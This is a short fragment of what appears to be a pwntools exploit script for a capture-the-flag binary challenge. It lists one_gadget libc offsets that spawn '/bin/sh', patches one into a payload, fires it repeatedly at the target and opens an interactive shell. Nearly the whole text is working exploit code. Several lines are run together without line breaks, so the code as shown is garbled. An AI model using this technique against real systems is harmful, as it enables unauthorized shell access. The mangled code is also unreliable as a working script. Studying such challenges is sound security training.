constraints:address rsp+0x40 is writablerax == NULL || {rax, "-c", rbx, NULL} is a valid argv0x3f43a execve("/bin/sh", rsp+0x30, environ)
constraints:[rsp+0x30] == NULL || {[rsp+0x30], [rsp+0x38], [rsp+0x40], [rsp+0x48], ...} is a valid argv0xd5c07 execve("/bin/sh", rsp+0x70, environ)
constraints:[rsp+0x70] == NULL || {[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...} is a valid argv
'''
oggs=[i+libc.address for i in [0x3f3e6,0x3f43a,0xd5c07]]
payload=payload.replace(b'waaaaaae',p64(oggs[1]))
io.sendlineafter(b'message:',payload)
io.recvuntil(b"(1:no)")
for _ in range(20):io.sendline(b'1\n'*5)io.sendlineafter(b'message:',payload)sleep(1)
io.interactive()